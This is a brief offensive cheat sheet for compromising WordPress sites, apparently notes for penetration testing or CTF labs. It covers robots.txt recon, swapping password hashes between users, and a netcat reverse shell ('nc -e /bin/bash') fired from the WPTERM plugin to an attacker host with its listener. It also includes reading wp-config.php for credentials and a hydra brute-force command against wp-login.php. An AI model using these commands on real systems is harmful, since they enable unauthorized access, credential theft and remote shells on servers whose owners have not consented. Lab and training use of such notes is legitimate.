# Extra commands

**\[1] always check for robots.txt**

/robots.txt /wordpress/robots.txt

**\[2] if you find the domain, add it to /etc/hosts**

**\[3]default login pages**

check /wordpress/wp-login.php

**\[4] Wordpress Bitnami**

If you have access to control panel, you can copy and paste the password hash of a previously PWD user into another user 

**\[5] Check in tools if WPTERM is installed, basically a mock terminal** 

Just fire off a reverse shell to your kali host

`nc -e /bin/bash 10.10.10.10 1234`

`nc -nvlp 1234`

**\[6]Once you have access to dashboard, check info under : tools → Site Health → Info**

**\[7] Post Exploitation:**

cd /var/www/html

**#Check out the wp-config.php file** for creds/configurations

**#Also:  cd /var/www/html/wordpress**

**\[8] Crack admin console with hydra**

```
hydra -l admin -P pass.txt > $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
```